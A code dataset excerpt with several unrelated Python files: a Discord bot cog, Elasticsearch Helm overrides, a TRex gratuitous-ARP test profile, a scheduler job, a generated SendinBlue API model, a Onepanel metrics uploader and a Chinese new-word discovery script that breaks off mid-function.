content
stringlengths 5
1.05M
|
|---|
import discord, random, asyncio, chalk
from discord.ext import commands as client
from Cogs.config import conf
class Start(client.Cog):#does the on_ready stuff
def __init__(self, bot):
self.b = bot
@client.Cog.listener()
async def on_ready(self):
print("\n")
print(chalk.green(f"[SUCCESS] Connected to Discord as: {self.b.user}"))
print(chalk.cyan(f"[INFO] Config name: '{conf.name}'")) #Shows us the name defined in the config
print(chalk.cyan(f"[INFO] Default Prefix: 'Prefix 1: {conf.prefix1} | Prefix 2: {conf.prefix2}'")) #Shows us the 2 prefixes defined in the config
print(chalk.cyan(f"[INFO] I'm currently in [{len(self.b.guilds)}] server(s).")) #Shows us how many servers we are in
for guild in self.b.guilds: #Set all guild the doki is in to have triggers enabled on startup otherwise they no be in list which means triggers are off.
conf.w_tog_on.insert(0, guild.id)
while True: #A loop to make the game activity change every 900 seconds
for list in conf.playing_msg:
await self.b.change_presence(activity=discord.Game(name=list))
await asyncio.sleep(900)
@client.Cog.listener()
async def on_guild_join(self,guild):
conf.w_tog_on.insert(0, guild.id)
# Remember to add a message here
def setup(bot):
bot.add_cog(Start(bot))
|
#
# Copyright (c) 2019 Wind River Systems, Inc.
#
# SPDX-License-Identifier: Apache-2.0
#
from oslo_log import log as logging
from sysinv.common import exception
from sysinv.common import utils
from sysinv.helm import common
from sysinv.helm import elastic
LOG = logging.getLogger(__name__)
class ElasticsearchHelm(elastic.ElasticBaseHelm):
"""Class to encapsulate helm operations for elasticsearch"""
CHART = common.HELM_CHART_ELASTICSEARCH
def get_overrides(self, namespace=None):
overrides = {
common.HELM_NS_MONITOR: {
'cluster': self._get_cluster_overrides(),
'master': self._get_master_overrides(),
'data': self._get_data_overrides(),
'client': self._get_client_overrides(),
}
}
if namespace in self.SUPPORTED_NAMESPACES:
return overrides[namespace]
elif namespace:
raise exception.InvalidHelmNamespace(chart=self.CHART,
namespace=namespace)
else:
return overrides
def _get_cluster_overrides(self):
env_vars = {'MINIMUM_MASTER_NODES': "1",
'EXPECTED_MASTER_NODES': "1",
'RECOVER_AFTER_MASTER_NODES': "1"}
if utils.is_aio_simplex_system(self.dbapi):
cluster_initial_master_nodes = ['stx-elasticsearch-master-0']
else:
cluster_initial_master_nodes = ['stx-elasticsearch-master-0',
'stx-elasticsearch-master-1']
conf = {
'env': env_vars,
'config': {
'cluster.initial_master_nodes': cluster_initial_master_nodes},
}
return conf
def _get_master_overrides(self):
if utils.is_aio_system(self.dbapi):
heap_size = "256m"
else:
heap_size = "512m"
conf = {
'replicas':
self._count_hosts_by_label(common.LABEL_MONITOR_CONTROLLER),
'heapSize': heap_size,
'nodeSelector': {common.LABEL_MONITOR_CONTROLLER: "enabled"},
}
return conf
def _get_data_overrides(self):
# Note memory values are to be system engineered.
if utils.is_aio_system(self.dbapi):
heap_size = "512m"
memory_size = "512Mi"
else:
heap_size = "1536m"
memory_size = "1536Mi"
conf = {
'replicas':
self._count_hosts_by_label(common.LABEL_MONITOR_DATA),
'heapSize': heap_size,
'resources': {
'limits': {
'cpu': "1"
},
'requests': {
'cpu': "25m",
'memory': memory_size,
}, },
'persistence': {'storageClass': 'general',
'size': "100Gi"},
'nodeSelector': {common.LABEL_MONITOR_DATA: "enabled"},
}
return conf
def _get_client_overrides(self):
if utils.is_aio_system(self.dbapi):
heap_size = "256m"
else:
heap_size = "512m"
conf = {
'replicas':
self._count_hosts_by_label(common.LABEL_MONITOR_CLIENT),
'heapSize': heap_size,
'nodeSelector': {common.LABEL_MONITOR_CLIENT: "enabled"},
}
return conf
|
from trex_stl_lib.api import *
# send G ARP from many clients
# clients are "00:00:dd:dd:00:01+x", psrc="55.55.1.1+x" DG= self.dg
class STLS1(object):
def __init__ (self):
self.num_clients =3000; # max is 16bit
def create_stream (self):
# Create base packet and pad it to size
base_pkt = Ether(src="00:00:dd:dd:00:01",dst="ff:ff:ff:ff:ff:ff")/ARP(psrc="55.55.1.1",hwsrc="00:00:dd:dd:00:01", hwdst="00:00:dd:dd:00:01", pdst="55.55.1.1")
vm = STLScVmRaw( [ STLVmFlowVar(name="mac_src", min_value=1, max_value=self.num_clients, size=2, op="inc"),
STLVmWrFlowVar(fv_name="mac_src", pkt_offset= 10),
STLVmWrFlowVar(fv_name="mac_src" ,pkt_offset="ARP.psrc",offset_fixup=2),
STLVmWrFlowVar(fv_name="mac_src" ,pkt_offset="ARP.hwsrc",offset_fixup=4),
STLVmWrFlowVar(fv_name="mac_src" ,pkt_offset="ARP.pdst",offset_fixup=2),
STLVmWrFlowVar(fv_name="mac_src" ,pkt_offset="ARP.hwdst",offset_fixup=4),
]
)
return STLStream(packet = STLPktBuilder(pkt = base_pkt,vm = vm),
mode = STLTXSingleBurst( pps=10, total_pkts = self.num_clients )) # single burst of G-ARP
def get_streams (self, direction = 0, **kwargs):
# create 1 stream
return [ self.create_stream() ]
# dynamic load - used for trex console or simulator
def register():
return STLS1()
|
#!/usr/bin/env python
# encoding: utf-8
"""
@author: zhanghe
@software: PyCharm
@file: run_job_counter_clear.py
@time: 2018-05-02 10:24
"""
import time
import schedule
from apps.client_rk import counter_clear as job_counter_clear
from tools import catch_keyboard_interrupt
# 计数清零
schedule.every().day.at('00:00').do(job_counter_clear)
@catch_keyboard_interrupt
def run():
while True:
schedule.run_pending()
time.sleep(1)
if __name__ == '__main__':
run()
|
# coding: utf-8
"""
SendinBlue API
SendinBlue provide a RESTFul API that can be used with any languages. With this API, you will be able to : - Manage your campaigns and get the statistics - Manage your contacts - Send transactional Emails and SMS - and much more... You can download our wrappers at https://github.com/orgs/sendinblue **Possible responses** | Code | Message | | :-------------: | ------------- | | 200 | OK. Successful Request | | 201 | OK. Successful Creation | | 202 | OK. Request accepted | | 204 | OK. Successful Update/Deletion | | 400 | Error. Bad Request | | 401 | Error. Authentication Needed | | 402 | Error. Not enough credit, plan upgrade needed | | 403 | Error. Permission denied | | 404 | Error. Object does not exist | | 405 | Error. Method not allowed | | 406 | Error. Not Acceptable | # noqa: E501
OpenAPI spec version: 3.0.0
Contact: contact@sendinblue.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class GetExtendedCampaignOverview(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'id': 'int',
'name': 'str',
'subject': 'str',
'type': 'str',
'status': 'str',
'scheduled_at': 'datetime',
'ab_testing': 'bool',
'subject_a': 'str',
'subject_b': 'str',
'split_rule': 'int',
'winner_criteria': 'str',
'winner_delay': 'int',
'send_at_best_time': 'bool',
'test_sent': 'bool',
'header': 'str',
'footer': 'str',
'sender': 'GetExtendedCampaignOverviewSender',
'reply_to': 'str',
'to_field': 'str',
'html_content': 'str',
'share_link': 'str',
'tag': 'str',
'created_at': 'datetime',
'modified_at': 'datetime',
'inline_image_activation': 'bool',
'mirror_active': 'bool',
'recurring': 'bool',
'sent_date': 'datetime',
'return_bounce': 'int'
}
attribute_map = {
'id': 'id',
'name': 'name',
'subject': 'subject',
'type': 'type',
'status': 'status',
'scheduled_at': 'scheduledAt',
'ab_testing': 'abTesting',
'subject_a': 'subjectA',
'subject_b': 'subjectB',
'split_rule': 'splitRule',
'winner_criteria': 'winnerCriteria',
'winner_delay': 'winnerDelay',
'send_at_best_time': 'sendAtBestTime',
'test_sent': 'testSent',
'header': 'header',
'footer': 'footer',
'sender': 'sender',
'reply_to': 'replyTo',
'to_field': 'toField',
'html_content': 'htmlContent',
'share_link': 'shareLink',
'tag': 'tag',
'created_at': 'createdAt',
'modified_at': 'modifiedAt',
'inline_image_activation': 'inlineImageActivation',
'mirror_active': 'mirrorActive',
'recurring': 'recurring',
'sent_date': 'sentDate',
'return_bounce': 'returnBounce'
}
def __init__(self, id=None, name=None, subject=None, type=None, status=None, scheduled_at=None, ab_testing=None, subject_a=None, subject_b=None, split_rule=None, winner_criteria=None, winner_delay=None, send_at_best_time=None, test_sent=None, header=None, footer=None, sender=None, reply_to=None, to_field=None, html_content=None, share_link=None, tag=None, created_at=None, modified_at=None, inline_image_activation=None, mirror_active=None, recurring=None, sent_date=None, return_bounce=None): # noqa: E501
"""GetExtendedCampaignOverview - a model defined in Swagger""" # noqa: E501
self._id = None
self._name = None
self._subject = None
self._type = None
self._status = None
self._scheduled_at = None
self._ab_testing = None
self._subject_a = None
self._subject_b = None
self._split_rule = None
self._winner_criteria = None
self._winner_delay = None
self._send_at_best_time = None
self._test_sent = None
self._header = None
self._footer = None
self._sender = None
self._reply_to = None
self._to_field = None
self._html_content = None
self._share_link = None
self._tag = None
self._created_at = None
self._modified_at = None
self._inline_image_activation = None
self._mirror_active = None
self._recurring = None
self._sent_date = None
self._return_bounce = None
self.discriminator = None
self.id = id
self.name = name
if subject is not None:
self.subject = subject
self.type = type
self.status = status
if scheduled_at is not None:
self.scheduled_at = scheduled_at
if ab_testing is not None:
self.ab_testing = ab_testing
if subject_a is not None:
self.subject_a = subject_a
if subject_b is not None:
self.subject_b = subject_b
if split_rule is not None:
self.split_rule = split_rule
if winner_criteria is not None:
self.winner_criteria = winner_criteria
if winner_delay is not None:
self.winner_delay = winner_delay
if send_at_best_time is not None:
self.send_at_best_time = send_at_best_time
self.test_sent = test_sent
self.header = header
self.footer = footer
self.sender = sender
self.reply_to = reply_to
if to_field is not None:
self.to_field = to_field
self.html_content = html_content
if share_link is not None:
self.share_link = share_link
if tag is not None:
self.tag = tag
self.created_at = created_at
self.modified_at = modified_at
if inline_image_activation is not None:
self.inline_image_activation = inline_image_activation
if mirror_active is not None:
self.mirror_active = mirror_active
if recurring is not None:
self.recurring = recurring
if sent_date is not None:
self.sent_date = sent_date
if return_bounce is not None:
self.return_bounce = return_bounce
@property
def id(self):
"""Gets the id of this GetExtendedCampaignOverview. # noqa: E501
ID of the campaign # noqa: E501
:return: The id of this GetExtendedCampaignOverview. # noqa: E501
:rtype: int
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this GetExtendedCampaignOverview.
ID of the campaign # noqa: E501
:param id: The id of this GetExtendedCampaignOverview. # noqa: E501
:type: int
"""
if id is None:
raise ValueError("Invalid value for `id`, must not be `None`") # noqa: E501
self._id = id
@property
def name(self):
"""Gets the name of this GetExtendedCampaignOverview. # noqa: E501
Name of the campaign # noqa: E501
:return: The name of this GetExtendedCampaignOverview. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this GetExtendedCampaignOverview.
Name of the campaign # noqa: E501
:param name: The name of this GetExtendedCampaignOverview. # noqa: E501
:type: str
"""
if name is None:
raise ValueError("Invalid value for `name`, must not be `None`") # noqa: E501
self._name = name
@property
def subject(self):
"""Gets the subject of this GetExtendedCampaignOverview. # noqa: E501
Subject of the campaign. Only available if `abTesting` flag of the campaign is `false` # noqa: E501
:return: The subject of this GetExtendedCampaignOverview. # noqa: E501
:rtype: str
"""
return self._subject
@subject.setter
def subject(self, subject):
"""Sets the subject of this GetExtendedCampaignOverview.
Subject of the campaign. Only available if `abTesting` flag of the campaign is `false` # noqa: E501
:param subject: The subject of this GetExtendedCampaignOverview. # noqa: E501
:type: str
"""
self._subject = subject
@property
def type(self):
"""Gets the type of this GetExtendedCampaignOverview. # noqa: E501
Type of campaign # noqa: E501
:return: The type of this GetExtendedCampaignOverview. # noqa: E501
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this GetExtendedCampaignOverview.
Type of campaign # noqa: E501
:param type: The type of this GetExtendedCampaignOverview. # noqa: E501
:type: str
"""
if type is None:
raise ValueError("Invalid value for `type`, must not be `None`") # noqa: E501
allowed_values = ["classic", "trigger"] # noqa: E501
if type not in allowed_values:
raise ValueError(
"Invalid value for `type` ({0}), must be one of {1}" # noqa: E501
.format(type, allowed_values)
)
self._type = type
@property
def status(self):
"""Gets the status of this GetExtendedCampaignOverview. # noqa: E501
Status of the campaign # noqa: E501
:return: The status of this GetExtendedCampaignOverview. # noqa: E501
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this GetExtendedCampaignOverview.
Status of the campaign # noqa: E501
:param status: The status of this GetExtendedCampaignOverview. # noqa: E501
:type: str
"""
if status is None:
raise ValueError("Invalid value for `status`, must not be `None`") # noqa: E501
allowed_values = ["draft", "sent", "archive", "queued", "suspended", "in_process"] # noqa: E501
if status not in allowed_values:
raise ValueError(
"Invalid value for `status` ({0}), must be one of {1}" # noqa: E501
.format(status, allowed_values)
)
self._status = status
@property
def scheduled_at(self):
"""Gets the scheduled_at of this GetExtendedCampaignOverview. # noqa: E501
UTC date-time on which campaign is scheduled (YYYY-MM-DDTHH:mm:ss.SSSZ) # noqa: E501
:return: The scheduled_at of this GetExtendedCampaignOverview. # noqa: E501
:rtype: datetime
"""
return self._scheduled_at
@scheduled_at.setter
def scheduled_at(self, scheduled_at):
"""Sets the scheduled_at of this GetExtendedCampaignOverview.
UTC date-time on which campaign is scheduled (YYYY-MM-DDTHH:mm:ss.SSSZ) # noqa: E501
:param scheduled_at: The scheduled_at of this GetExtendedCampaignOverview. # noqa: E501
:type: datetime
"""
self._scheduled_at = scheduled_at
@property
def ab_testing(self):
"""Gets the ab_testing of this GetExtendedCampaignOverview. # noqa: E501
Status of A/B Test for the campaign. abTesting = false means it is disabled, & abTesting = true means it is enabled. # noqa: E501
:return: The ab_testing of this GetExtendedCampaignOverview. # noqa: E501
:rtype: bool
"""
return self._ab_testing
@ab_testing.setter
def ab_testing(self, ab_testing):
"""Sets the ab_testing of this GetExtendedCampaignOverview.
Status of A/B Test for the campaign. abTesting = false means it is disabled, & abTesting = true means it is enabled. # noqa: E501
:param ab_testing: The ab_testing of this GetExtendedCampaignOverview. # noqa: E501
:type: bool
"""
self._ab_testing = ab_testing
@property
def subject_a(self):
"""Gets the subject_a of this GetExtendedCampaignOverview. # noqa: E501
Subject A of the ab-test campaign. Only available if `abTesting` flag of the campaign is `true` # noqa: E501
:return: The subject_a of this GetExtendedCampaignOverview. # noqa: E501
:rtype: str
"""
return self._subject_a
@subject_a.setter
def subject_a(self, subject_a):
"""Sets the subject_a of this GetExtendedCampaignOverview.
Subject A of the ab-test campaign. Only available if `abTesting` flag of the campaign is `true` # noqa: E501
:param subject_a: The subject_a of this GetExtendedCampaignOverview. # noqa: E501
:type: str
"""
self._subject_a = subject_a
@property
def subject_b(self):
"""Gets the subject_b of this GetExtendedCampaignOverview. # noqa: E501
Subject B of the ab-test campaign. Only available if `abTesting` flag of the campaign is `true` # noqa: E501
:return: The subject_b of this GetExtendedCampaignOverview. # noqa: E501
:rtype: str
"""
return self._subject_b
@subject_b.setter
def subject_b(self, subject_b):
"""Sets the subject_b of this GetExtendedCampaignOverview.
Subject B of the ab-test campaign. Only available if `abTesting` flag of the campaign is `true` # noqa: E501
:param subject_b: The subject_b of this GetExtendedCampaignOverview. # noqa: E501
:type: str
"""
self._subject_b = subject_b
@property
def split_rule(self):
"""Gets the split_rule of this GetExtendedCampaignOverview. # noqa: E501
The size of your ab-test groups. Only available if `abTesting` flag of the campaign is `true` # noqa: E501
:return: The split_rule of this GetExtendedCampaignOverview. # noqa: E501
:rtype: int
"""
return self._split_rule
@split_rule.setter
def split_rule(self, split_rule):
"""Sets the split_rule of this GetExtendedCampaignOverview.
The size of your ab-test groups. Only available if `abTesting` flag of the campaign is `true` # noqa: E501
:param split_rule: The split_rule of this GetExtendedCampaignOverview. # noqa: E501
:type: int
"""
self._split_rule = split_rule
@property
def winner_criteria(self):
"""Gets the winner_criteria of this GetExtendedCampaignOverview. # noqa: E501
Criteria for the winning version. Only available if `abTesting` flag of the campaign is `true` # noqa: E501
:return: The winner_criteria of this GetExtendedCampaignOverview. # noqa: E501
:rtype: str
"""
return self._winner_criteria
@winner_criteria.setter
def winner_criteria(self, winner_criteria):
"""Sets the winner_criteria of this GetExtendedCampaignOverview.
Criteria for the winning version. Only available if `abTesting` flag of the campaign is `true` # noqa: E501
:param winner_criteria: The winner_criteria of this GetExtendedCampaignOverview. # noqa: E501
:type: str
"""
self._winner_criteria = winner_criteria
@property
def winner_delay(self):
"""Gets the winner_delay of this GetExtendedCampaignOverview. # noqa: E501
The duration of the test in hours at the end of which the winning version will be sent. Only available if `abTesting` flag of the campaign is `true` # noqa: E501
:return: The winner_delay of this GetExtendedCampaignOverview. # noqa: E501
:rtype: int
"""
return self._winner_delay
@winner_delay.setter
def winner_delay(self, winner_delay):
"""Sets the winner_delay of this GetExtendedCampaignOverview.
The duration of the test in hours at the end of which the winning version will be sent. Only available if `abTesting` flag of the campaign is `true` # noqa: E501
:param winner_delay: The winner_delay of this GetExtendedCampaignOverview. # noqa: E501
:type: int
"""
self._winner_delay = winner_delay
@property
def send_at_best_time(self):
"""Gets the send_at_best_time of this GetExtendedCampaignOverview. # noqa: E501
It is true if you have chosen to send your campaign at best time, otherwise it is false # noqa: E501
:return: The send_at_best_time of this GetExtendedCampaignOverview. # noqa: E501
:rtype: bool
"""
return self._send_at_best_time
@send_at_best_time.setter
def send_at_best_time(self, send_at_best_time):
"""Sets the send_at_best_time of this GetExtendedCampaignOverview.
It is true if you have chosen to send your campaign at best time, otherwise it is false # noqa: E501
:param send_at_best_time: The send_at_best_time of this GetExtendedCampaignOverview. # noqa: E501
:type: bool
"""
self._send_at_best_time = send_at_best_time
@property
def test_sent(self):
"""Gets the test_sent of this GetExtendedCampaignOverview. # noqa: E501
Retrieved the status of test email sending. (true=Test email has been sent false=Test email has not been sent) # noqa: E501
:return: The test_sent of this GetExtendedCampaignOverview. # noqa: E501
:rtype: bool
"""
return self._test_sent
@test_sent.setter
def test_sent(self, test_sent):
"""Sets the test_sent of this GetExtendedCampaignOverview.
Retrieved the status of test email sending. (true=Test email has been sent false=Test email has not been sent) # noqa: E501
:param test_sent: The test_sent of this GetExtendedCampaignOverview. # noqa: E501
:type: bool
"""
if test_sent is None:
raise ValueError("Invalid value for `test_sent`, must not be `None`") # noqa: E501
self._test_sent = test_sent
@property
def header(self):
"""Gets the header of this GetExtendedCampaignOverview. # noqa: E501
Header of the campaign # noqa: E501
:return: The header of this GetExtendedCampaignOverview. # noqa: E501
:rtype: str
"""
return self._header
@header.setter
def header(self, header):
"""Sets the header of this GetExtendedCampaignOverview.
Header of the campaign # noqa: E501
:param header: The header of this GetExtendedCampaignOverview. # noqa: E501
:type: str
"""
if header is None:
raise ValueError("Invalid value for `header`, must not be `None`") # noqa: E501
self._header = header
@property
def footer(self):
"""Gets the footer of this GetExtendedCampaignOverview. # noqa: E501
Footer of the campaign # noqa: E501
:return: The footer of this GetExtendedCampaignOverview. # noqa: E501
:rtype: str
"""
return self._footer
@footer.setter
def footer(self, footer):
"""Sets the footer of this GetExtendedCampaignOverview.
Footer of the campaign # noqa: E501
:param footer: The footer of this GetExtendedCampaignOverview. # noqa: E501
:type: str
"""
if footer is None:
raise ValueError("Invalid value for `footer`, must not be `None`") # noqa: E501
self._footer = footer
@property
def sender(self):
"""Gets the sender of this GetExtendedCampaignOverview. # noqa: E501
:return: The sender of this GetExtendedCampaignOverview. # noqa: E501
:rtype: GetExtendedCampaignOverviewSender
"""
return self._sender
@sender.setter
def sender(self, sender):
"""Sets the sender of this GetExtendedCampaignOverview.
:param sender: The sender of this GetExtendedCampaignOverview. # noqa: E501
:type: GetExtendedCampaignOverviewSender
"""
if sender is None:
raise ValueError("Invalid value for `sender`, must not be `None`") # noqa: E501
self._sender = sender
@property
def reply_to(self):
"""Gets the reply_to of this GetExtendedCampaignOverview. # noqa: E501
Email defined as the \"Reply to\" of the campaign # noqa: E501
:return: The reply_to of this GetExtendedCampaignOverview. # noqa: E501
:rtype: str
"""
return self._reply_to
@reply_to.setter
def reply_to(self, reply_to):
"""Sets the reply_to of this GetExtendedCampaignOverview.
Email defined as the \"Reply to\" of the campaign # noqa: E501
:param reply_to: The reply_to of this GetExtendedCampaignOverview. # noqa: E501
:type: str
"""
if reply_to is None:
raise ValueError("Invalid value for `reply_to`, must not be `None`") # noqa: E501
self._reply_to = reply_to
@property
def to_field(self):
"""Gets the to_field of this GetExtendedCampaignOverview. # noqa: E501
Customisation of the \"to\" field of the campaign # noqa: E501
:return: The to_field of this GetExtendedCampaignOverview. # noqa: E501
:rtype: str
"""
return self._to_field
@to_field.setter
def to_field(self, to_field):
"""Sets the to_field of this GetExtendedCampaignOverview.
Customisation of the \"to\" field of the campaign # noqa: E501
:param to_field: The to_field of this GetExtendedCampaignOverview. # noqa: E501
:type: str
"""
self._to_field = to_field
@property
def html_content(self):
"""Gets the html_content of this GetExtendedCampaignOverview. # noqa: E501
HTML content of the campaign # noqa: E501
:return: The html_content of this GetExtendedCampaignOverview. # noqa: E501
:rtype: str
"""
return self._html_content
@html_content.setter
def html_content(self, html_content):
"""Sets the html_content of this GetExtendedCampaignOverview.
HTML content of the campaign # noqa: E501
:param html_content: The html_content of this GetExtendedCampaignOverview. # noqa: E501
:type: str
"""
if html_content is None:
raise ValueError("Invalid value for `html_content`, must not be `None`") # noqa: E501
self._html_content = html_content
@property
def share_link(self):
"""Gets the share_link of this GetExtendedCampaignOverview. # noqa: E501
Link to share the campaign on social medias # noqa: E501
:return: The share_link of this GetExtendedCampaignOverview. # noqa: E501
:rtype: str
"""
return self._share_link
@share_link.setter
def share_link(self, share_link):
"""Sets the share_link of this GetExtendedCampaignOverview.
Link to share the campaign on social medias # noqa: E501
:param share_link: The share_link of this GetExtendedCampaignOverview. # noqa: E501
:type: str
"""
self._share_link = share_link
@property
def tag(self):
"""Gets the tag of this GetExtendedCampaignOverview. # noqa: E501
Tag of the campaign # noqa: E501
:return: The tag of this GetExtendedCampaignOverview. # noqa: E501
:rtype: str
"""
return self._tag
@tag.setter
def tag(self, tag):
"""Sets the tag of this GetExtendedCampaignOverview.
Tag of the campaign # noqa: E501
:param tag: The tag of this GetExtendedCampaignOverview. # noqa: E501
:type: str
"""
self._tag = tag
@property
def created_at(self):
"""Gets the created_at of this GetExtendedCampaignOverview. # noqa: E501
Creation UTC date-time of the campaign (YYYY-MM-DDTHH:mm:ss.SSSZ) # noqa: E501
:return: The created_at of this GetExtendedCampaignOverview. # noqa: E501
:rtype: datetime
"""
return self._created_at
@created_at.setter
def created_at(self, created_at):
"""Sets the created_at of this GetExtendedCampaignOverview.
Creation UTC date-time of the campaign (YYYY-MM-DDTHH:mm:ss.SSSZ) # noqa: E501
:param created_at: The created_at of this GetExtendedCampaignOverview. # noqa: E501
:type: datetime
"""
if created_at is None:
raise ValueError("Invalid value for `created_at`, must not be `None`") # noqa: E501
self._created_at = created_at
@property
def modified_at(self):
"""Gets the modified_at of this GetExtendedCampaignOverview. # noqa: E501
UTC date-time of last modification of the campaign (YYYY-MM-DDTHH:mm:ss.SSSZ) # noqa: E501
:return: The modified_at of this GetExtendedCampaignOverview. # noqa: E501
:rtype: datetime
"""
return self._modified_at
@modified_at.setter
def modified_at(self, modified_at):
"""Sets the modified_at of this GetExtendedCampaignOverview.
UTC date-time of last modification of the campaign (YYYY-MM-DDTHH:mm:ss.SSSZ) # noqa: E501
:param modified_at: The modified_at of this GetExtendedCampaignOverview. # noqa: E501
:type: datetime
"""
if modified_at is None:
raise ValueError("Invalid value for `modified_at`, must not be `None`") # noqa: E501
self._modified_at = modified_at
@property
def inline_image_activation(self):
"""Gets the inline_image_activation of this GetExtendedCampaignOverview. # noqa: E501
Status of inline image. inlineImageActivation = false means image can’t be embedded, & inlineImageActivation = true means image can be embedded, in the email. # noqa: E501
:return: The inline_image_activation of this GetExtendedCampaignOverview. # noqa: E501
:rtype: bool
"""
return self._inline_image_activation
@inline_image_activation.setter
def inline_image_activation(self, inline_image_activation):
"""Sets the inline_image_activation of this GetExtendedCampaignOverview.
Status of inline image. inlineImageActivation = false means image can’t be embedded, & inlineImageActivation = true means image can be embedded, in the email. # noqa: E501
:param inline_image_activation: The inline_image_activation of this GetExtendedCampaignOverview. # noqa: E501
:type: bool
"""
self._inline_image_activation = inline_image_activation
@property
def mirror_active(self):
"""Gets the mirror_active of this GetExtendedCampaignOverview. # noqa: E501
Status of mirror links in campaign. mirrorActive = false means mirror links are deactivated, & mirrorActive = true means mirror links are activated, in the campaign # noqa: E501
:return: The mirror_active of this GetExtendedCampaignOverview. # noqa: E501
:rtype: bool
"""
return self._mirror_active
@mirror_active.setter
def mirror_active(self, mirror_active):
"""Sets the mirror_active of this GetExtendedCampaignOverview.
Status of mirror links in campaign. mirrorActive = false means mirror links are deactivated, & mirrorActive = true means mirror links are activated, in the campaign # noqa: E501
:param mirror_active: The mirror_active of this GetExtendedCampaignOverview. # noqa: E501
:type: bool
"""
self._mirror_active = mirror_active
@property
def recurring(self):
"""Gets the recurring of this GetExtendedCampaignOverview. # noqa: E501
FOR TRIGGER ONLY ! Type of trigger campaign.recurring = false means contact can receive the same Trigger campaign only once, & recurring = true means contact can receive the same Trigger campaign several times # noqa: E501
:return: The recurring of this GetExtendedCampaignOverview. # noqa: E501
:rtype: bool
"""
return self._recurring
@recurring.setter
def recurring(self, recurring):
"""Sets the recurring of this GetExtendedCampaignOverview.
FOR TRIGGER ONLY ! Type of trigger campaign.recurring = false means contact can receive the same Trigger campaign only once, & recurring = true means contact can receive the same Trigger campaign several times # noqa: E501
:param recurring: The recurring of this GetExtendedCampaignOverview. # noqa: E501
:type: bool
"""
self._recurring = recurring
@property
def sent_date(self):
"""Gets the sent_date of this GetExtendedCampaignOverview. # noqa: E501
Sent UTC date-time of the campaign (YYYY-MM-DDTHH:mm:ss.SSSZ). Only available if 'status' of the campaign is 'sent' # noqa: E501
:return: The sent_date of this GetExtendedCampaignOverview. # noqa: E501
:rtype: datetime
"""
return self._sent_date
@sent_date.setter
def sent_date(self, sent_date):
"""Sets the sent_date of this GetExtendedCampaignOverview.
Sent UTC date-time of the campaign (YYYY-MM-DDTHH:mm:ss.SSSZ). Only available if 'status' of the campaign is 'sent' # noqa: E501
:param sent_date: The sent_date of this GetExtendedCampaignOverview. # noqa: E501
:type: datetime
"""
self._sent_date = sent_date
@property
def return_bounce(self):
"""Gets the return_bounce of this GetExtendedCampaignOverview. # noqa: E501
Total number of non-delivered campaigns for a particular campaign id. # noqa: E501
:return: The return_bounce of this GetExtendedCampaignOverview. # noqa: E501
:rtype: int
"""
return self._return_bounce
@return_bounce.setter
def return_bounce(self, return_bounce):
"""Sets the return_bounce of this GetExtendedCampaignOverview.
Total number of non-delivered campaigns for a particular campaign id. # noqa: E501
:param return_bounce: The return_bounce of this GetExtendedCampaignOverview. # noqa: E501
:type: int
"""
self._return_bounce = return_bounce
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(GetExtendedCampaignOverview, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, GetExtendedCampaignOverview):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
import os
import json
import argparse
import onepanel.core.api
from onepanel.core.api.models.metric import Metric
from onepanel.core.api.rest import ApiException
from onepanel.core.api.models import Parameter
def main(args):
# Load Task A metrics
with open(args.from_file) as f:
metrics = json.load(f)
with open('/var/run/secrets/kubernetes.io/serviceaccount/token') as f:
token = f.read()
# Configure API authorization
configuration = onepanel.core.api.Configuration(
host = os.getenv('ONEPANEL_API_URL'),
api_key = {
'authorization': token
}
)
configuration.api_key_prefix['authorization'] = 'Bearer'
# Call SDK method to save metrics
with onepanel.core.api.ApiClient(configuration) as api_client:
api_instance = onepanel.core.api.WorkflowServiceApi(api_client)
namespace = os.getenv('ONEPANEL_RESOURCE_NAMESPACE')
uid = os.getenv('ONEPANEL_RESOURCE_UID')
body = onepanel.core.api.AddWorkflowExecutionsMetricsRequest()
body.metrics = metrics
try:
api_response = api_instance.add_workflow_execution_metrics(namespace, uid, body)
print('Metrics added.')
except ApiException as e:
print('Exception when calling WorkflowServiceApi->add_workflow_execution_metrics: %s\n' % e)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--from_file', help='JSON file containing metrics.', required=True)
main(parser.parse_args())
|
# -*- encoding:utf-8 -*-
"""
* Copyright (C) 2017 OwnThink.
*
* Name : findword.py - 新词发现
* Author : Yener <yener@ownthink.com>
* Version : 0.01
* Description : 新词发现算法实现
special thanks to
http://www.matrix67.com/blog/archives/5044
https://github.com/zoulala/New_words_find
"""
import re
from math import log
from collections import Counter
max_word_len = 6
re_chinese = re.compile(u"[\w]+", re.U)
def count_words(input_file):
word_freq = Counter()
fin = open(input_file, 'r', encoding='utf8')
for index, line in enumerate(fin):
words = []
for sentence in re_chinese.findall(line):
length = len(sentence)
for i in range(length):
words += [sentence[i: j + i] for j in range(1, min(length - i + 1, max_word_len + 1))]
word_freq.update(words)
fin.close()
return word_freq
def lrg_info(word_freq, total_word, min_freq, min_mtro):
l_dict = {}
r_dict = {}
k = 0
for word, freq in word_freq.items():
k += 1
if len(word) < 3:
continue
left_word = word[:-1]
ml = word_freq[left_word]
if ml > min_freq:
mul_info1 = ml * total_word / (word_freq[left_word[1:]] * word_freq[left_word[0]])
